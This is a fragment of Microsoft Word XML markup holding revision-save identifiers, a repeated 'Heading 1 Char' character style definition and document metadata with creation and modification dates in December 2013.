    <w:rsid w:val="002B3A31"/>
    <w:rsid w:val="003722BE"/>
    <w:rsid w:val="004631E8"/>
    <w:rsid w:val="004C4BE3"/>
    <w:rsid w:val="0054167B"/>
    <w:rsid w:val="00542FF2"/>
    <w:rsid w:val="008654BA"/>
    <w:rsid w:val="00877C01"/>
    <w:rsid w:val="008D6433"/>
    <w:rsid w:val="0097361B"/>
    <w:rsid w:val="009E7C6F"/>
    <w:rsid w:val="009F3ECE"/>
    <w:rsid w:val="00AE1547"/>
    <w:rsid w:val="00B1469A"/>
    <w:rsid w:val="00B87C2D"/>
    <w:rsid w:val="00C376B1"/>
    <w:rsid w:val="00C449C7"/>
    <w:rsid w:val="00CC01D0"/>
    <w:rsid w:val="00CF7D0A"/>
    <w:rsid w:val="00D637F6"/>
    <w:rsid w:val="00D85D0F"/>
    <w:rsid w:val="00D969BC"/>
    <w:rsid w:val="00E40613"/>
    <w:rsid w:val="00E412C1"/>
    <w:rsid w:val="00F9402D"/>
    <w:rsid w:val="00FB6377"/>
    <w:rsid w:val="00FC1861"/>
    <w:rsid w:val="00FC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02D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F94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4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02D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F94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32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-01T06:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-01T06:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>